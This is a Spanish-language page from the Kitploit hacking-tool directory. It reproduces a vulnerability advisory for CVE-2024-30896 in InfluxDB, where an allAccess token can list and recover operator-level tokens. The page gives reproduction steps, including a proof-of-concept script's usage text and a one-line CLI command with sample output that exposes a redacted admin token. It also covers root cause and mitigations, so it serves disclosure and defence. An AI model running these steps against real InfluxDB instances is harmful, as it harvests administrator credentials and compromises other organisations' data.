Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-30896 | Kitploit
Herramientas/GitHubGitHub/xenom0rph97/cve-2024-30896
Autenticación y AutorizaciónEscalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónSeguridad en la NubeSeguridad de Bases de Datos
GitHubxenom0rph97/cve-2024-30896

CVE-2024-30896

Ver Repositorio
21hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-30896

Resumen

Una falla de lógica de negocio en influxdb permite a los usuarios que poseen un token allAccess válido escalar sus privilegios al nivel de operador al listar los tokens de autorización actuales.

Escenario

El atacante podría ser un usuario al que un administrador le otorgó acceso mediante un token allAccess únicamente dentro de su organización. Los permisos de este usuario permitirán el control total sobre la organización, pero aún le impedirán interactuar con otras organizaciones.

Impacto

Esta vulnerabilidad permitiría a un usuario obtener acceso sin restricciones a la instancia de influxdb. Una condición similar podría comprometer por completo la Confidencialidad, Integridad y Disponibilidad de los datos propiedad de usuarios de diferentes organizaciones. Además, dado que el token de operador tiene permisos administrativos, la Disponibilidad y la Integridad de toda la instancia de influxdb podrían verse comprometidas.

Requisitos previos/Limitaciones

  1. El atacante debe tener un token allAccess válido
  2. El token allAccess debe haber sido creado en la misma org donde reside un token de operador (p. ej., la misma org que el usuario administrador)
  3. El atacante debe poder interactuar con la instancia de influxdb a través de la CLI o las API (influxClient)

Pasos para reproducir

Caso 1: Explotación mediante las API de influxdb:

Uso del script

root@kitploit:~
% python3 ./influxdbPrivescCVE_PoC.py -h
usage: influxdbPrivescCVE_PoC.py [-h] [-t TOKEN] [-e ENDPOINTURL] [-v [VERBOSE]] [-vv [VVERBOSE]]

optional arguments:
  -h, --help            show this help message and exit
  -t TOKEN, --token TOKEN
                        Custom or allAccess token to access influx DB instance
  -e ENDPOINTURL, --endpointUrl ENDPOINTURL
                        Endpoint Url of influxdb instance (ex. "https://myInfluxdbInstance:8086/")
  -v [VERBOSE], --verbose [VERBOSE]
                        Enable verbose logging - INFO
  -vv [VVERBOSE], --vverbose [VVERBOSE]
                        Enable verbose logging - DEBUG

Caso 2: Explotación mediante la CLI de influx

  1. Ejecute: influx auth ls -t <allAccessToken> | grep write:/orgs. Esto listará todos los tokens de operador activos actuales en la instancia de influxdb.

Ejemplo

root@kitploit:~
# Using an allAccess token 
influx auth ls -t U1OuqmFC{REDACTED} | grep U1OuqmFC{REDACTED}

0cc41c3b050e5000							U1OuqmFC{REDACTED}	
admin		0cb9c92ee228b000	[read:orgs/87d0746948a3b3f5/authorizations write:orgs/87d0746948a3b3f5/authorizations read:orgs/87d0746948a3b3f5/buckets write:orgs/87d0746948a3b3f5/buckets read:orgs/87d0746948a3b3f5/dashboards write:orgs/87d0746948a3b3f5/dashboards read:/orgs/87d0746948a3b3f5 read:orgs/87d0746948a3b3f5/sources write:orgs/87d0746948a3b3f5/sources read:orgs/87d0746948a3b3f5/tasks write:orgs/87d0746948a3b3f5/tasks read:orgs/87d0746948a3b3f5/telegrafs write:orgs/87d0746948a3b3f5/telegrafs read:/users/0cb9c92ee228b000 write:/users/0cb9c92ee228b000 read:orgs/87d0746948a3b3f5/variables write:orgs/87d0746948a3b3f5/variables read:orgs/87d0746948a3b3f5/scrapers write:orgs/87d0746948a3b3f5/scrapers read:orgs/87d0746948a3b3f5/secrets write:orgs/87d0746948a3b3f5/secrets read:orgs/87d0746948a3b3f5/labels write:orgs/87d0746948a3b3f5/labels read:orgs/87d0746948a3b3f5/views write:orgs/87d0746948a3b3f5/views read:orgs/87d0746948a3b3f5/documents write:orgs/87d0746948a3b3f5/documents read:orgs/87d0746948a3b3f5/notificationRules write:orgs/87d0746948a3b3f5/notificationRules read:orgs/87d0746948a3b3f5/notificationEndpoints write:orgs/87d0746948a3b3f5/notificationEndpoints read:orgs/87d0746948a3b3f5/checks write:orgs/87d0746948a3b3f5/checks read:orgs/87d0746948a3b3f5/dbrp write:orgs/87d0746948a3b3f5/dbrp read:orgs/87d0746948a3b3f5/notebooks write:orgs/87d0746948a3b3f5/notebooks read:orgs/87d0746948a3b3f5/annotations write:orgs/87d0746948a3b3f5/annotations read:orgs/87d0746948a3b3f5/remotes write:orgs/87d0746948a3b3f5/remotes read:orgs/87d0746948a3b3f5/replications write:orgs/87d0746948a3b3f5/replications]

# Listing all available tokens passing allAccess token and retrieving only operator level tokens
influx auth ls -t U1OuqmFC{REDACTED} | grep write:/orgs

0cbb920e128e5000							gerKYLO0Ph_ibUk0y{REDACTED}
admin		0cb9c92ee228b000	[read:/authorizations write:/authorizations read:/buckets write:/buckets read:/dashboards write:/dashboards read:/orgs write:/orgs read:/sources write:/sources read:/tasks write:/tasks read:/telegrafs write:/telegrafs read:/users write:/users read:/variables write:/variables read:/scrapers write:/scrapers read:/secrets write:/secrets read:/labels write:/labels read:/views write:/views read:/documents write:/documents read:/notificationRules write:/notificationRules read:/notificationEndpoints write:/notificationEndpoints read:/checks write:/checks read:/dbrp write:/dbrp read:/notebooks write:/notebooks read:/annotations write:/annotations read:/remotes write:/remotes read:/replications write:/replications]

Causa raíz

Los tokens allAccess tienen, por defecto, permisos para listar todas las autorizaciones definidas en la misma org sin restricciones basadas en el tipo (custom, allAccess, operator) -> read:orgs/87d0746948a3b3f5/authorizations.

Mitigación temporal

Al ejecutarse, influx setup creará la primera org (por defecto), en la que se almacenará automáticamente un token de operador. Los usuarios solo deberían recibir acceso a las organizaciones secundarias creadas. Se recomienda crear múltiples organizaciones y proporcionar a los usuarios únicamente aquellas que no contengan un token de operador.

Recomendaciones

  • No comparta ninguna organización que contenga un token de operador
  • Evite almacenar tokens de operador en orgs no predeterminadas

Puntuación base CVSS: 9.1

Vector CVSS v3.1: AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Descargar herramienta